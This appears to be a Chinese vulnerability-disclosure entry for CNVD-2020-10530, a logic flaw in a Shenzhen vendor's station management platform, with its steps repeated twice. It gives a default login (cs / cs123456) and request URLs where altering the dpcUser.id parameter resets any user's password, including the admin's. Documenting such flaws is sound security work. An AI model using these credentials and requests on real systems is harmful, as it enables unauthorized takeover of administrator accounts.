CNVD-2020-10530_深圳市科皓信息技術有限公司_測站綜合管理平台_邏輯缺陷漏洞

# CNVD-2020-10530 深圳市科皓信息技術有限公司 測站綜合管理平台 邏輯缺陷漏洞

==前提條件==
該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有用戶(包括管理員)的密碼。

https:///dpc/
==默認用戶信息==
cs
cs123456
==重置Admin密碼==
https:///dpc/dpcUser!preEdit.action?dpcUser.id=1
修改dpcUser.id參數的值可以編輯任意用戶,其中可以對任意用戶進行重置密碼,如:
https:///dpc/dpcUser!preEdit.action?dpcUser.id=2
https:///dpc/dpcUser!preEdit.action?dpcUser.id=3


==前提條件==

該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有用戶(包括管理員)的密碼。

https:///dpc/
==默認用戶信息==
cs
cs123456
==重置Admin密碼==
https:///dpc/dpcUser!preEdit.action?dpcUser.id=1

修改dpcUser.id參數的值可以編輯任意用戶,其中可以對任意用戶進行重置密碼,如:
https:///dpc/dpcUser!preEdit.action?dpcUser.id=2
https:///dpc/dpcUser!preEdit.action?dpcUser.id=3
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容